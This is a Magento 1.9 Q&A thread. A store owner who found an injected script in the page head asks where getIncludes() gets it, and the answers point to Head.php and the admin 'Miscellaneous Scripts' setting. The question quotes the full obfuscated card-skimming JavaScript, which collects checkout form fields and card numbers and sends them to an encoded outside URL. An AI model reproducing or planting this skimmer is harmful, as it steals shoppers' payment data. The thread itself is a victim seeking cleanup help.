# Check file location in includes

Tags: magento-1.9

i fond `<?php echo $this->getIncludes() ?>` this code in my `head.phtml` it will show some encoding script like hacking code below mention

```
<script type="text/javascript">function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")||(document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html("&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#111;&#119;&#110;&#115;&#97;&#102;&#101;&#116;&#121;&#46;&#111;&#114;&#103;&#47;&#111;&#112;&#112;&#46;&#112;&#104;&#112;").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script>
```

How to check `<?php echo $this->getIncludes() ?>` where this file available

Answer (score 1, accepted):

check this file 
`app/code/core/Mage/Page/Block/Html/Head.php`  line `473`

```
public function getIncludes()
    {
        if (empty($this->_data['includes'])) {
            $this->_data['includes'] = Mage::getStoreConfig('design/head/includes');
        }
        return $this->_data['includes'];
    }
```

Comment: actually it return that encode script can i remove here

Comment: you can remove this code from admin panel go to `system->configuration->design->html header -> miscellaneous script`

Comment: ya thanks i got it. How they inject this code in through DB

Comment: ok i accepted ....

Answer (score 1):

Check this file

```
app/code/core/Mage/Page/Block/Html/Head.php
```

for method getIncludes and

LogIn to admin panel and go to

> System > Configuration > Design > HTML Head > Miscellaneous Scripts

You will get that js script